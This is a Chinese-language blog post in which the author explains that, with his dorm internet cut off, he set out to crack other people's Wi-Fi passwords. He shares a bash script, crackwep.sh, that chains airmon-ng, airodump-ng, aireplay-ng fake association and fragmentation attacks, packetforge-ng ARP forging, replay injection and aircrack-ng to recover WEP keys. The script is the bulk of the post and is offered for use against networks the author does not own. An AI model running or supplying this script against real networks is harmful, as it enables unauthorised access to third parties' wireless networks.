前几天宿舍断网,暂时没充卡,所以就想歪了:能不能破解别人的无线路由密码。
到网上搜了很多,照着教程试着破解,用的是aircrack-ng,成功破解了2个wep的密码,但也花掉了不少的时间。
将整个过程整理了一下,写成了一个简单的脚本:
默认频道设为6了,加密位数默认用64位的了,整个过程难都不难,但一定要有耐心.
友情提醒一下,如果你用无线网,加密方式最好设为WPA2,这个现在暂时还是很安全的。

gentoo-pjq 320 # cat crackwep.sh
#########################################################################
# Author: [email protected]
# Created Time: Fri 09 Oct 2009 09:37:43 PM CST
# File Name: crackwep.sh
# Description:Welcome to visit:www.impjq.net for more information.
#########################################################################
#!/bin/bash

CHANNEL=6
TMP=tmp.txt
echo "start wlan0 monitor:airmon-ng start wlan0 ${CHANNEL}"
airmon-ng stop mon0
airmon-ng stop mon1
rm *.cap
airmon-ng start wlan0 6
#airmon-ng start wlan0 ${CHANNEL}
echo "airmon-ng"
read -p "start monitor ok:y/n?:" RESULT

echo "Display the details on the Channel:airodump-ng --ivs -w pack -c ${CHANNEL} mon0 &>${TMP}"
echo "Please wait for about 30 seconds,then Ctrl+C to interrupt it."
echo "use tail -f ${TMP} to see the details"
airodump-ng --ivs -w pack -c ${CHANNEL} mon0 &>${TMP}
echo "cat ${TMP}"
cat ${TMP}

read -p "Please input essid:" ESSID
echo "grep ${ESSID} ${TMP}"
AP_MAC=`grep ${ESSID} ${TMP}|cut -d " " -f2|head -n 1`
echo "AP_MAC:${AP_MAC}"

PC_MAC=`ifconfig|grep wlan0|cut -d " " -f10|head -n 1`
echo "PC_MAC:${PC_MAC}"

echo "欺骗模式:aireplay-ng -1 0 -e ${ESSID} -a ${AP_MAC} -h ${PC_MAC} mon0"
aireplay-ng -1 0 -e ${ESSID} -a ${AP_MAC} -h ${PC_MAC} mon0
read -p "Association successful?:(y/n):" RESULT

echo "delete the fragment-xxxx-xxxx.xor file first: rm fragment*.xor"
rm fragment*.xor

echo "aireplay-ng -5 -b ${AP_MAC} -h ${PC_MAC} mon0"
aireplay-ng -5 -b ${AP_MAC} -h ${PC_MAC} mon0

echo "check whether create the fragment-xxxx-xxxx.xor file?"
ls -lht *.xor

read -p "Create the fragment-xxxx-xxxx.xor file?(y/n):" RESULT

echo "packetforge-ng -0 -a ${AP_MAC} -h ${PC_MAC} -k 255.255.255.255 -l 255.255.255.255 -y fragment*.xor -w mrarp"
packetforge-ng -0 -a ${AP_MAC} -h ${PC_MAC} -k 255.255.255.255 -l 255.255.255.255 -y fragment*.xor -w mrarp


echo "After you run:aireplay-ng -2 -r mrarp -x 256 mon0"
echo "**************************************************************************"
echo "you should run:airodump-ng --ivs -w pack -c ${CHANNEL} mon0 &>${TMP} to check the #Data  grow to 10000"
echo "**************************************************************************"
echo "aireplay-ng -2 -r mrarp -x 256 mon0"
aireplay-ng -2 -r mrarp -x 256 mon0


echo "Run:aircrack-ng -n 64 -b ${AP_MAC} pack-01.ivs to get the key!"
echo "**************************************************************************"
echo "Get the key:"
ls -lht *.ivs
read -p "Input the pack file name,like:pack-01.ivs" RESULT
read -p "加密位数:64/128(64):" TYPE
echo "aircrack-ng -n ${TYPE} -b ${AP_MAC} ${RESULT}"
aircrack-ng -n ${TYPE} -b ${AP_MAC} ${RESULT}

这个脚本现在功能还很简单,就是将整过程的命令放到一起,一般自己用用还是够的了。

破解wep密码脚本

6 thoughts on “破解wep密码脚本

Leave a Reply

Your email address will not be published. Required fields are marked *

This site uses Akismet to reduce spam. Learn how your comment data is processed.